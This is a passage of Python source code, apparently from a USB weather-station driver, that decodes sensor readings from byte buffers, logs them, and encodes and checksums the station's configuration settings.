        self._WindchillMinMax._Min._IsError = (self._WindchillMinMax._Min._Value == CWeatherTraits.TemperatureNP())
        self._WindchillMinMax._Min._IsOverflow = (self._WindchillMinMax._Min._Value == CWeatherTraits.TemperatureOFL())
        self._WindchillMinMax._Max._IsError = (self._WindchillMinMax._Max._Value == CWeatherTraits.TemperatureNP())
        self._WindchillMinMax._Max._IsOverflow = (self._WindchillMinMax._Max._Value == CWeatherTraits.TemperatureOFL())
        self._WindchillMinMax._Max._Time = None if self._WindchillMinMax._Max._IsError or self._WindchillMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 45, 0, 'WindchillMax')
        self._WindchillMinMax._Min._Time = None if self._WindchillMinMax._Min._IsError or self._WindchillMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 50, 0, 'WindchillMin')

        self._DewpointMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 73, 0)
        self._DewpointMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 76, 1)
        self._Dewpoint = USBHardware.toTemperature_5_3(nbuf, 78, 0)
        self._DewpointMinMax._Min._IsError = (self._DewpointMinMax._Min._Value == CWeatherTraits.TemperatureNP())
        self._DewpointMinMax._Min._IsOverflow = (self._DewpointMinMax._Min._Value == CWeatherTraits.TemperatureOFL())
        self._DewpointMinMax._Max._IsError = (self._DewpointMinMax._Max._Value == CWeatherTraits.TemperatureNP())
        self._DewpointMinMax._Max._IsOverflow = (self._DewpointMinMax._Max._Value == CWeatherTraits.TemperatureOFL())
        self._DewpointMinMax._Min._Time = None if self._DewpointMinMax._Min._IsError or self._DewpointMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 68, 0, 'DewpointMin')
        self._DewpointMinMax._Max._Time = None if self._DewpointMinMax._Max._IsError or self._DewpointMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 63, 0, 'DewpointMax')

        self._HumidityIndoorMinMax._Max._Value = USBHardware.toHumidity_2_0(nbuf, 91, 1)
        self._HumidityIndoorMinMax._Min._Value = USBHardware.toHumidity_2_0(nbuf, 92, 1)
        self._HumidityIndoor = USBHardware.toHumidity_2_0(nbuf, 93, 1)
        self._HumidityIndoorMinMax._Min._IsError = (self._HumidityIndoorMinMax._Min._Value == CWeatherTraits.HumidityNP())
        self._HumidityIndoorMinMax._Min._IsOverflow = (self._HumidityIndoorMinMax._Min._Value == CWeatherTraits.HumidityOFL())
        self._HumidityIndoorMinMax._Max._IsError = (self._HumidityIndoorMinMax._Max._Value == CWeatherTraits.HumidityNP())
        self._HumidityIndoorMinMax._Max._IsOverflow = (self._HumidityIndoorMinMax._Max._Value == CWeatherTraits.HumidityOFL())
        self._HumidityIndoorMinMax._Max._Time = None if self._HumidityIndoorMinMax._Max._IsError or self._HumidityIndoorMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 81, 1, 'HumidityIndoorMax')
        self._HumidityIndoorMinMax._Min._Time = None if self._HumidityIndoorMinMax._Min._IsError or self._HumidityIndoorMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 86, 1, 'HumidityIndoorMin')

        self._HumidityOutdoorMinMax._Max._Value = USBHardware.toHumidity_2_0(nbuf, 104, 1)
        self._HumidityOutdoorMinMax._Min._Value = USBHardware.toHumidity_2_0(nbuf, 105, 1)
        self._HumidityOutdoor = USBHardware.toHumidity_2_0(nbuf, 106, 1)
        self._HumidityOutdoorMinMax._Min._IsError = (self._HumidityOutdoorMinMax._Min._Value == CWeatherTraits.HumidityNP())
        self._HumidityOutdoorMinMax._Min._IsOverflow = (self._HumidityOutdoorMinMax._Min._Value == CWeatherTraits.HumidityOFL())
        self._HumidityOutdoorMinMax._Max._IsError = (self._HumidityOutdoorMinMax._Max._Value == CWeatherTraits.HumidityNP())
        self._HumidityOutdoorMinMax._Max._IsOverflow = (self._HumidityOutdoorMinMax._Max._Value == CWeatherTraits.HumidityOFL())
        self._HumidityOutdoorMinMax._Max._Time = None if self._HumidityOutdoorMinMax._Max._IsError or self._HumidityOutdoorMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 94, 1, 'HumidityOutdoorMax')
        self._HumidityOutdoorMinMax._Min._Time = None if self._HumidityOutdoorMinMax._Min._IsError or self._HumidityOutdoorMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 99, 1, 'HumidityOutdoorMin')

        self._RainLastMonthMax._Max._Time = USBHardware.toDateTime(nbuf, 107, 1, 'RainLastMonthMax')
        self._RainLastMonthMax._Max._Value = USBHardware.toRain_6_2(nbuf, 112, 1)
        self._RainLastMonth = USBHardware.toRain_6_2(nbuf, 115, 1)

        self._RainLastWeekMax._Max._Time = USBHardware.toDateTime(nbuf, 118, 1, 'RainLastWeekMax')
        self._RainLastWeekMax._Max._Value = USBHardware.toRain_6_2(nbuf, 123, 1)
        self._RainLastWeek = USBHardware.toRain_6_2(nbuf, 126, 1)

        self._Rain24HMax._Max._Time = USBHardware.toDateTime(nbuf, 129, 1, 'Rain24HMax')
        self._Rain24HMax._Max._Value = USBHardware.toRain_6_2(nbuf, 134, 1)
        self._Rain24H = USBHardware.toRain_6_2(nbuf, 137, 1)
        
        self._Rain1HMax._Max._Time = USBHardware.toDateTime(nbuf, 140, 1, 'Rain1HMax')
        self._Rain1HMax._Max._Value = USBHardware.toRain_6_2(nbuf, 145, 1)
        self._Rain1H = USBHardware.toRain_6_2(nbuf, 148, 1)

        self._LastRainReset = USBHardware.toDateTime(nbuf, 151, 0, 'LastRainReset')
        self._RainTotal = USBHardware.toRain_7_3(nbuf, 156, 0)

        (w ,w1) = USBHardware.readWindDirectionShared(nbuf, 162)
        (w2,w3) = USBHardware.readWindDirectionShared(nbuf, 161)
        (w4,w5) = USBHardware.readWindDirectionShared(nbuf, 160)
        self._WindDirection = w
        self._WindDirection1 = w1
        self._WindDirection2 = w2
        self._WindDirection3 = w3
        self._WindDirection4 = w4
        self._WindDirection5 = w5

        if DEBUG_WEATHER_DATA > 2:
            unknownbuf = [0]*9
            for i in xrange(0,9):
                unknownbuf[i] = nbuf[163+i]
            strbuf = ""
            for i in unknownbuf:
                strbuf += str("%.2x " % i)
            logdbg('Bytes with unknown meaning at 157-165: %s' % strbuf)

        self._WindSpeed = USBHardware.toWindspeed_6_2(nbuf, 172)

        # FIXME: read the WindErrFlags
        (g ,g1) = USBHardware.readWindDirectionShared(nbuf, 177)
        (g2,g3) = USBHardware.readWindDirectionShared(nbuf, 176)
        (g4,g5) = USBHardware.readWindDirectionShared(nbuf, 175)
        self._GustDirection = g
        self._GustDirection1 = g1
        self._GustDirection2 = g2
        self._GustDirection3 = g3
        self._GustDirection4 = g4
        self._GustDirection5 = g5

        self._GustMax._Max._Value = USBHardware.toWindspeed_6_2(nbuf, 184)
        self._GustMax._Max._IsError = (self._GustMax._Max._Value == CWeatherTraits.WindNP())
        self._GustMax._Max._IsOverflow = (self._GustMax._Max._Value == CWeatherTraits.WindOFL())
        self._GustMax._Max._Time = None if self._GustMax._Max._IsError or self._GustMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 179, 1, 'GustMax')
        self._Gust = USBHardware.toWindspeed_6_2(nbuf, 187)

        # Apparently the station returns only ONE date time for both hPa/inHg
        # Min Time Reset and Max Time Reset
        self._PressureRelative_hPaMinMax._Max._Time = USBHardware.toDateTime(nbuf, 190, 1, 'PressureRelative_hPaMax')
        self._PressureRelative_inHgMinMax._Max._Time = self._PressureRelative_hPaMinMax._Max._Time
        self._PressureRelative_hPaMinMax._Min._Time  = self._PressureRelative_hPaMinMax._Max._Time # firmware bug, should be: USBHardware.toDateTime(nbuf, 195, 1)
        self._PressureRelative_inHgMinMax._Min._Time = self._PressureRelative_hPaMinMax._Min._Time        

        (self._PresRel_hPa_Max, self._PresRel_inHg_Max) = USBHardware.readPressureShared(nbuf, 195, 1) # firmware bug, should be: self._PressureRelative_hPaMinMax._Min._Time
        (self._PressureRelative_hPaMinMax._Max._Value, self._PressureRelative_inHgMinMax._Max._Value) = USBHardware.readPressureShared(nbuf, 200, 1)
        (self._PressureRelative_hPaMinMax._Min._Value, self._PressureRelative_inHgMinMax._Min._Value) = USBHardware.readPressureShared(nbuf, 205, 1)
        (self._PressureRelative_hPa, self._PressureRelative_inHg) = USBHardware.readPressureShared(nbuf, 210, 1)

    def toLog(self):
        logdbg("_WeatherState=%s _WeatherTendency=%s _AlarmRingingFlags %04x" % (CWeatherTraits.forecastMap[self._WeatherState], CWeatherTraits.trendMap[self._WeatherTendency], self._AlarmRingingFlags))
        logdbg("_TempIndoor=     %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._TempIndoor, self._TempIndoorMinMax._Min._Value, self._TempIndoorMinMax._Min._Time, self._TempIndoorMinMax._Max._Value, self._TempIndoorMinMax._Max._Time))
        logdbg("_HumidityIndoor= %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._HumidityIndoor, self._HumidityIndoorMinMax._Min._Value, self._HumidityIndoorMinMax._Min._Time, self._HumidityIndoorMinMax._Max._Value, self._HumidityIndoorMinMax._Max._Time))
        logdbg("_TempOutdoor=    %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._TempOutdoor, self._TempOutdoorMinMax._Min._Value, self._TempOutdoorMinMax._Min._Time, self._TempOutdoorMinMax._Max._Value, self._TempOutdoorMinMax._Max._Time))
        logdbg("_HumidityOutdoor=%8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._HumidityOutdoor, self._HumidityOutdoorMinMax._Min._Value, self._HumidityOutdoorMinMax._Min._Time, self._HumidityOutdoorMinMax._Max._Value, self._HumidityOutdoorMinMax._Max._Time))
        logdbg("_Windchill=      %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._Windchill, self._WindchillMinMax._Min._Value, self._WindchillMinMax._Min._Time, self._WindchillMinMax._Max._Value, self._WindchillMinMax._Max._Time))
        logdbg("_Dewpoint=       %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._Dewpoint, self._DewpointMinMax._Min._Value, self._DewpointMinMax._Min._Time, self._DewpointMinMax._Max._Value, self._DewpointMinMax._Max._Time))
        logdbg("_WindSpeed=      %8.3f" % self._WindSpeed)
        logdbg("_Gust=           %8.3f                                      _Max=%8.3f (%s)" % (self._Gust, self._GustMax._Max._Value, self._GustMax._Max._Time))
        logdbg('_WindDirection=    %3s    _GustDirection=    %3s' % (CWeatherTraits.windDirMap[self._WindDirection],  CWeatherTraits.windDirMap[self._GustDirection]))
        logdbg('_WindDirection1=   %3s    _GustDirection1=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection1], CWeatherTraits.windDirMap[self._GustDirection1]))
        logdbg('_WindDirection2=   %3s    _GustDirection2=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection2], CWeatherTraits.windDirMap[self._GustDirection2]))
        logdbg('_WindDirection3=   %3s    _GustDirection3=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection3], CWeatherTraits.windDirMap[self._GustDirection3]))
        logdbg('_WindDirection4=   %3s    _GustDirection4=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection4], CWeatherTraits.windDirMap[self._GustDirection4]))
        logdbg('_WindDirection5=   %3s    _GustDirection5=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection5], CWeatherTraits.windDirMap[self._GustDirection5]))
        if (self._RainLastMonth > 0) or (self._RainLastWeek > 0):
            logdbg("_RainLastMonth=  %8.3f                                      _Max=%8.3f (%s)" % (self._RainLastMonth, self._RainLastMonthMax._Max._Value, self._RainLastMonthMax._Max._Time))
            logdbg("_RainLastWeek=   %8.3f                                      _Max=%8.3f (%s)" % (self._RainLastWeek, self._RainLastWeekMax._Max._Value, self._RainLastWeekMax._Max._Time))
        logdbg("_Rain24H=        %8.3f                                      _Max=%8.3f (%s)" % (self._Rain24H, self._Rain24HMax._Max._Value, self._Rain24HMax._Max._Time))
        logdbg("_Rain1H=         %8.3f                                      _Max=%8.3f (%s)" % (self._Rain1H, self._Rain1HMax._Max._Value, self._Rain1HMax._Max._Time))
        logdbg("_RainTotal=      %8.3f                            _LastRainReset=         (%s)" % (self._RainTotal,  self._LastRainReset))
        logdbg("PressureRel_hPa= %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s) " % (self._PressureRelative_hPa, self._PressureRelative_hPaMinMax._Min._Value, self._PressureRelative_hPaMinMax._Min._Time, self._PressureRelative_hPaMinMax._Max._Value, self._PressureRelative_hPaMinMax._Max._Time))                       
        logdbg("PressureRel_inHg=%8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s) " % (self._PressureRelative_inHg, self._PressureRelative_inHgMinMax._Min._Value, self._PressureRelative_inHgMinMax._Min._Time, self._PressureRelative_inHgMinMax._Max._Value, self._PressureRelative_inHgMinMax._Max._Time))                       
        ###logdbg('(* Bug in Weather Station: PressureRelative._Min._Time is written to location of _PressureRelative._Max._Time')
        ###logdbg('Instead of PressureRelative._Min._Time we get: _PresRel_hPa_Max= %8.3f, _PresRel_inHg_max =%8.3f;' % (self._PresRel_hPa_Max, self._PresRel_inHg_Max))


class CWeatherStationConfig(object):
    def __init__(self):
        self._InBufCS = 0  # checksum of received config
        self._OutBufCS = 0 # calculated config checksum from outbuf config
        self._ClockMode = 0
        self._TemperatureFormat = 0
        self._PressureFormat = 0
        self._RainFormat = 0
        self._WindspeedFormat = 0
        self._WeatherThreshold = 0
        self._StormThreshold = 0
        self._LCDContrast = 0
        self._LowBatFlags = 0
        self._WindDirAlarmFlags = 0
        self._OtherAlarmFlags = 0
        self._ResetMinMaxFlags = 0 # output only
        self._HistoryInterval = 0
        self._TempIndoorMinMax = CMinMaxMeasurement()
        self._TempOutdoorMinMax = CMinMaxMeasurement()
        self._HumidityIndoorMinMax = CMinMaxMeasurement()
        self._HumidityOutdoorMinMax = CMinMaxMeasurement()
        self._Rain24HMax = CMinMaxMeasurement()
        self._GustMax = CMinMaxMeasurement()
        self._PressureRelative_hPaMinMax = CMinMaxMeasurement()
        self._PressureRelative_inHgMinMax = CMinMaxMeasurement()

    def setTemps(self,TempFormat,InTempLo,InTempHi,OutTempLo,OutTempHi):
        f1 = TempFormat
        t1 = InTempLo
        t2 = InTempHi
        t3 = OutTempLo
        t4 = OutTempHi
        if f1 not in [ETemperatureFormat.tfFahrenheit,
                      ETemperatureFormat.tfCelsius]:
            logerr('setTemps: unknown temperature format %s' % TempFormat)
            return 0
        if t1 < -40.0 or t1 > 59.9 or t2 < -40.0 or t2 > 59.9 or \
                t3 < -40.0 or t3 > 59.9 or t4 < -40.0 or t4 > 59.9:
            logerr('setTemps: one or more values out of range')
            return 0
        self._TemperatureFormat = f1
        self._TempIndoorMinMax._Min._Value = t1
        self._TempIndoorMinMax._Max._Value = t2
        self._TempOutdoorMinMax._Min._Value = t3
        self._TempOutdoorMinMax._Max._Value = t4
        return 1     
    
    def setHums(self,InHumLo,InHumHi,OutHumLo,OutHumHi):
        h1 = InHumLo
        h2 = InHumHi
        h3 = OutHumLo
        h4 = OutHumHi
        if h1 < 1 or h1 > 99 or h2 < 1 or h2 > 99 or \
                h3 < 1 or h3 > 99 or h4 < 1 or h4 > 99:
            logerr('setHums: one or more values out of range')
            return 0
        self._HumidityIndoorMinMax._Min._Value = h1
        self._HumidityIndoorMinMax._Max._Value = h2
        self._HumidityOutdoorMinMax._Min._Value = h3
        self._HumidityOutdoorMinMax._Max._Value = h4
        return 1
    
    def setRain24H(self,RainFormat,Rain24hHi):
        f1 = RainFormat
        r1 = Rain24hHi 
        if f1 not in [ERainFormat.rfMm, ERainFormat.rfInch]:
            logerr('setRain24: unknown format %s' % RainFormat)
            return 0
        if r1 < 0.0 or r1 > 9999.9:
            logerr('setRain24: value outside range')
            return 0
        self._RainFormat = f1
        self._Rain24HMax._Max._Value = r1
        return 1
    
    def setGust(self,WindSpeedFormat,GustHi):
        # When the units of a max gust alarm are changed in the weather
        # station itself, automatically the value is converted to the new
        # unit and rounded to a whole number.  Weewx receives a value
        # converted to km/h.
        #
        # It is too much trouble to sort out what exactly the internal
        # conversion algoritms are for the other wind units.
        #
        # Setting a value in km/h units is tested and works, so this will
        # be the only option available.  
        f1 = WindSpeedFormat
        g1 = GustHi
        if f1 < EWindspeedFormat.wfMs or f1 > EWindspeedFormat.wfMph:
            logerr('setGust: unknown format %s' % WindSpeedFormat)
            return 0
        if f1 != EWindspeedFormat.wfKmh:
            logerr('setGust: only units of km/h are supported')
            return 0
        if g1 < 0.0 or g1 > 180.0:
            logerr('setGust: value outside range')
            return 0 
        self._WindSpeedFormat = f1
        self._GustMax._Max._Value = int(g1) # apparently gust value is always an integer
        return 1
    
    def setPresRels(self,PressureFormat,PresRelhPaLo,PresRelhPaHi,PresRelinHgLo,PresRelinHgHi):
        f1 = PressureFormat
        p1 = PresRelhPaLo
        p2 = PresRelhPaHi
        p3 = PresRelinHgLo
        p4 = PresRelinHgHi
        if f1 not in [EPressureFormat.pfinHg, EPressureFormat.pfHPa]:
            logerr('setPresRel: unknown format %s' % PressureFormat)
            return 0
        if p1 < 920.0 or p1 > 1080.0 or p2 < 920.0 or p2 > 1080.0 or \
                p3 < 27.10 or p3 > 31.90 or p4 < 27.10 or p4 > 31.90:
            logerr('setPresRel: value outside range')
            return 0
        self._RainFormat = f1
        self._PressureRelative_hPaMinMax._Min._Value = p1
        self._PressureRelative_hPaMinMax._Max._Value = p2
        self._PressureRelative_inHgMinMax._Min._Value = p3
        self._PressureRelative_inHgMinMax._Max._Value = p4
        return 1
    
    def getOutBufCS(self):
        return self._OutBufCS
             
    def getInBufCS(self):
        return self._InBufCS
    
    def setResetMinMaxFlags(self, resetMinMaxFlags):
        logdbg('setResetMinMaxFlags: %s' % resetMinMaxFlags)
        self._ResetMinMaxFlags = resetMinMaxFlags

    def parseRain_3(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 7-digit number with 3 decimals'''
        num = int(number*1000)
        parsebuf=[0]*7
        for i in xrange(7-numbytes,7):
            parsebuf[i] = num%10
            num = num//10
        if StartOnHiNibble:
                buf[0][0+start] = parsebuf[6]*16 + parsebuf[5]
                buf[0][1+start] = parsebuf[4]*16 + parsebuf[3]
                buf[0][2+start] = parsebuf[2]*16 + parsebuf[1]
                buf[0][3+start] = parsebuf[0]*16 + (buf[0][3+start] & 0xF)
        else:
                buf[0][0+start] = (buf[0][0+start] & 0xF0) + parsebuf[6]
                buf[0][1+start] = parsebuf[5]*16 + parsebuf[4]
                buf[0][2+start] = parsebuf[3]*16 + parsebuf[2]
                buf[0][3+start] = parsebuf[1]*16 + parsebuf[0]
                        
    def parseWind_6(self, number, buf, start):
        '''Parse float number to 6 bytes'''
        num = int(number*100*256)
        parsebuf=[0]*6
        for i in xrange(0,6):
            parsebuf[i] = num%16
            num = num//16
        buf[0][0+start] = parsebuf[5]*16 + parsebuf[4]
        buf[0][1+start] = parsebuf[3]*16 + parsebuf[2]
        buf[0][2+start] = parsebuf[1]*16 + parsebuf[0]
        
    def parse_0(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 5-digit number with 0 decimals'''
        num = int(number)
        nbuf=[0]*5
        for i in xrange(5-numbytes,5):
            nbuf[i] = num%10
            num = num//10
        if StartOnHiNibble:
            buf[0][0+start] = nbuf[4]*16 + nbuf[3]
            buf[0][1+start] = nbuf[2]*16 + nbuf[1]
            buf[0][2+start] = nbuf[0]*16 + (buf[0][2+start] & 0x0F)
        else:
            buf[0][0+start] = (buf[0][0+start] & 0xF0) + nbuf[4]
            buf[0][1+start] = nbuf[3]*16 + nbuf[2]
            buf[0][2+start] = nbuf[1]*16 + nbuf[0]

    def parse_1(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 5 digit number with 1 decimal'''
        self.parse_0(number*10.0, buf, start, StartOnHiNibble, numbytes)
    
    def parse_2(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 5 digit number with 2 decimals'''
        self.parse_0(number*100.0, buf, start, StartOnHiNibble, numbytes)
    
    def parse_3(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 5 digit number with 3 decimals'''
        self.parse_0(number*1000.0, buf, start, StartOnHiNibble, numbytes)

    def read(self,buf):
        nbuf=[0]
        nbuf[0]=buf[0]
        self._WindspeedFormat = (nbuf[0][4] >> 4) & 0xF  
        self._RainFormat = (nbuf[0][4] >> 3) & 1
        self._PressureFormat = (nbuf[0][4] >> 2) & 1
        self._TemperatureFormat = (nbuf[0][4] >> 1) & 1
        self._ClockMode = nbuf[0][4] & 1
        self._StormThreshold = (nbuf[0][5] >> 4) & 0xF
        self._WeatherThreshold = nbuf[0][5] & 0xF
        self._LowBatFlags = (nbuf[0][6] >> 4) & 0xF
        self._LCDContrast = nbuf[0][6] & 0xF
        self._WindDirAlarmFlags = (nbuf[0][7] << 8) | nbuf[0][8]
        self._OtherAlarmFlags = (nbuf[0][9] << 8) | nbuf[0][10]
        self._TempIndoorMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 11, 1)
        self._TempIndoorMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 13, 0)
        self._TempOutdoorMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 16, 1)
        self._TempOutdoorMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 18, 0)
        self._HumidityIndoorMinMax._Max._Value = USBHardware.toHumidity_2_0(nbuf, 21, 1)
        self._HumidityIndoorMinMax._Min._Value = USBHardware.toHumidity_2_0(nbuf, 22, 1)
        self._HumidityOutdoorMinMax._Max._Value = USBHardware.toHumidity_2_0(nbuf, 23, 1)
        self._HumidityOutdoorMinMax._Min._Value = USBHardware.toHumidity_2_0(nbuf, 24, 1)
        self._Rain24HMax._Max._Value = USBHardware.toRain_7_3(nbuf, 25, 0)
        self._HistoryInterval = nbuf[0][29]
        self._GustMax._Max._Value = USBHardware.toWindspeed_6_2(nbuf, 30)
        (self._PressureRelative_hPaMinMax._Min._Value, self._PressureRelative_inHgMinMax._Min._Value) = USBHardware.readPressureShared(nbuf, 33, 1)
        (self._PressureRelative_hPaMinMax._Max._Value, self._PressureRelative_inHgMinMax._Max._Value) = USBHardware.readPressureShared(nbuf, 38, 1)
        self._ResetMinMaxFlags = (nbuf[0][43]) <<16 | (nbuf[0][44] << 8) | (nbuf[0][45])
        self._InBufCS = (nbuf[0][46] << 8) | nbuf[0][47]
        self._OutBufCS = calc_checksum(buf, 4, end=39) + 7

        """
        Reset DewpointMax    80 00 00
        Reset DewpointMin    40 00 00 
        not used             20 00 00 
        Reset WindchillMin*  10 00 00  *dateTime only; Min._Value is preserved
                
        Reset TempOutMax     08 00 00
        Reset TempOutMin     04 00 00
        Reset TempInMax      02 00 00
        Reset TempInMin      01 00 00 
         
        Reset Gust           00 80 00
        not used             00 40 00
        not used             00 20 00
        not used             00 10 00 
         
        Reset HumOutMax      00 08 00
        Reset HumOutMin      00 04 00 
        Reset HumInMax       00 02 00 
        Reset HumInMin       00 01 00 
          
        not used             00 00 80
        Reset Rain Total     00 00 40
        Reset last month?    00 00 20
        Reset last week?     00 00 10 
         
        Reset Rain24H        00 00 08
        Reset Rain1H         00 00 04 
        Reset PresRelMax     00 00 02 
        Reset PresRelMin     00 00 01                 
        """
        #self._ResetMinMaxFlags = 0x000000
        #logdbg('set _ResetMinMaxFlags to %06x' % self._ResetMinMaxFlags)

        """
        setTemps(self,TempFormat,InTempLo,InTempHi,OutTempLo,OutTempHi) 
        setHums(self,InHumLo,InHumHi,OutHumLo,OutHumHi)
        setPresRels(self,PressureFormat,PresRelhPaLo,PresRelhPaHi,PresRelinHgLo,PresRelinHgHi)  
        setGust(self,WindSpeedFormat,GustHi)
        setRain24H(self,RainFormat,Rain24hHi)
        """
        # Examples:
        #self.setTemps(ETemperatureFormat.tfCelsius,1.0,41.0,2.0,42.0) 
        #self.setHums(41,71,42,72)
        #self.setPresRels(EPressureFormat.pfHPa,960.1,1040.1,28.36,30.72)
        #self.setGust(EWindspeedFormat.wfKmh,040.0)
        #self.setRain24H(ERainFormat.rfMm,50.0)        

        # Set historyInterval to 5 minutes (default: 2 hours)
        self._HistoryInterval = EHistoryInterval.hi05Min
        # Clear all alarm flags, otherwise the datastream from the weather
        # station will pause during an alarm and connection will be lost.
        self._WindDirAlarmFlags = 0x0000
        self._OtherAlarmFlags   = 0x0000

    def testConfigChanged(self,buf):
        nbuf = [0]
        nbuf[0] = buf[0]
        nbuf[0][0] = 16*(self._WindspeedFormat & 0xF) + 8*(self._RainFormat & 1) + 4*(self._PressureFormat & 1) + 2*(self._TemperatureFormat & 1) + (self._ClockMode & 1)
        nbuf[0][1] = self._WeatherThreshold & 0xF | 16 * self._StormThreshold & 0xF0
        nbuf[0][2] = self._LCDContrast & 0xF | 16 * self._LowBatFlags & 0xF0
        nbuf[0][3] = (self._OtherAlarmFlags >> 0) & 0xFF
        nbuf[0][4] = (self._OtherAlarmFlags >> 8) & 0xFF
        nbuf[0][5] = (self._WindDirAlarmFlags >> 0) & 0xFF
        nbuf[0][6] = (self._WindDirAlarmFlags >> 8) & 0xFF
        # reverse buf from here
        self.parse_2(self._PressureRelative_inHgMinMax._Max._Value, nbuf, 7, 1, 5)
        self.parse_1(self._PressureRelative_hPaMinMax._Max._Value, nbuf, 9, 0, 5)
        self.parse_2(self._PressureRelative_inHgMinMax._Min._Value, nbuf, 12, 1, 5)
        self.parse_1(self._PressureRelative_hPaMinMax._Min._Value, nbuf, 14, 0, 5)
        self.parseWind_6(self._GustMax._Max._Value, nbuf, 17)
        nbuf[0][20] = self._HistoryInterval & 0xF
        self.parseRain_3(self._Rain24HMax._Max._Value, nbuf, 21, 0, 7)
        self.parse_0(self._HumidityOutdoorMinMax._Max._Value, nbuf, 25, 1, 2)
        self.parse_0(self._HumidityOutdoorMinMax._Min._Value, nbuf, 26, 1, 2)
        self.parse_0(self._HumidityIndoorMinMax._Max._Value, nbuf, 27, 1, 2)
        self.parse_0(self._HumidityIndoorMinMax._Min._Value, nbuf, 28, 1, 2)
        self.parse_3(self._TempOutdoorMinMax._Max._Value + CWeatherTraits.TemperatureOffset(), nbuf, 29, 1, 5)
        self.parse_3(self._TempOutdoorMinMax._Min._Value + CWeatherTraits.TemperatureOffset(), nbuf, 31, 0, 5)
        self.parse_3(self._TempIndoorMinMax._Max._Value + CWeatherTraits.TemperatureOffset(), nbuf, 34, 1, 5)
        self.parse_3(self._TempIndoorMinMax._Min._Value + CWeatherTraits.TemperatureOffset(), nbuf, 36, 0, 5)
        # reverse buf to here
        USBHardware.reverseByteOrder(nbuf, 7, 32)
        # do not include the ResetMinMaxFlags bytes when calculating checksum
        nbuf[0][39] = (self._ResetMinMaxFlags >> 16) & 0xFF
        nbuf[0][40] = (self._ResetMinMaxFlags >>  8) & 0xFF
        nbuf[0][41] = (self._ResetMinMaxFlags >>  0) & 0xFF
        self._OutBufCS = calc_checksum(nbuf, 0, end=39) + 7
        nbuf[0][42] = (self._OutBufCS >> 8) & 0xFF
        nbuf[0][43] = (self._OutBufCS >> 0) & 0xFF
        buf[0] = nbuf[0]   
        if self._OutBufCS == self._InBufCS and self._ResetMinMaxFlags == 0:
            if DEBUG_CONFIG_DATA > 2:
                logdbg('testConfigChanged: checksum not changed: OutBufCS=%04x' % self._OutBufCS)
            changed = 0
        else:
            if DEBUG_CONFIG_DATA > 0:
                logdbg('testConfigChanged: checksum or resetMinMaxFlags changed: OutBufCS=%04x InBufCS=%04x _ResetMinMaxFlags=%06x' % (self._OutBufCS, self._InBufCS, self._ResetMinMaxFlags))
            if DEBUG_CONFIG_DATA > 1:
                self.toLog()
            changed = 1
        return changed

    def toLog(self):
        logdbg('OutBufCS=             %04x' % self._OutBufCS)
        logdbg('InBufCS=              %04x' % self._InBufCS)
        logdbg('ClockMode=            %s' % self._ClockMode)
        logdbg('TemperatureFormat=    %s' % self._TemperatureFormat)
        logdbg('PressureFormat=       %s' % self._PressureFormat)
        logdbg('RainFormat=           %s' % self._RainFormat)
        logdbg('WindspeedFormat=      %s' % self._WindspeedFormat)
        logdbg('WeatherThreshold=     %s' % self._WeatherThreshold)
        logdbg('StormThreshold=       %s' % self._StormThreshold)
        logdbg('LCDContrast=          %s' % self._LCDContrast)
        logdbg('LowBatFlags=          %01x' % self._LowBatFlags)
        logdbg('WindDirAlarmFlags=    %04x' % self._WindDirAlarmFlags)
        logdbg('OtherAlarmFlags=      %04x' % self._OtherAlarmFlags)
        logdbg('HistoryInterval=      %s' % self._HistoryInterval)
        logdbg('TempIndoor_Min=       %s' % self._TempIndoorMinMax._Min._Value)
        logdbg('TempIndoor_Max=       %s' % self._TempIndoorMinMax._Max._Value)
        logdbg('TempOutdoor_Min=      %s' % self._TempOutdoorMinMax._Min._Value)
        logdbg('TempOutdoor_Max=      %s' % self._TempOutdoorMinMax._Max._Value)
        logdbg('HumidityIndoor_Min=   %s' % self._HumidityIndoorMinMax._Min._Value)
        logdbg('HumidityIndoor_Max=   %s' % self._HumidityIndoorMinMax._Max._Value)
        logdbg('HumidityOutdoor_Min=  %s' % self._HumidityOutdoorMinMax._Min._Value)
        logdbg('HumidityOutdoor_Max=  %s' % self._HumidityOutdoorMinMax._Max._Value)
        logdbg('Rain24HMax=           %s' % self._Rain24HMax._Max._Value)
        logdbg('GustMax=              %s' % self._GustMax._Max._Value)
        logdbg('PressureRel_hPa_Min=  %s' % self._PressureRelative_hPaMinMax._Min._Value)
        logdbg('PressureRel_inHg_Min= %s' % self._PressureRelative_inHgMinMax._Min._Value)
        logdbg('PressureRel_hPa_Max=  %s' % self._PressureRelative_hPaMinMax._Max._Value)
        logdbg('PressureRel_inHg_Max= %s' % self._PressureRelative_inHgMinMax._Max._Value) 
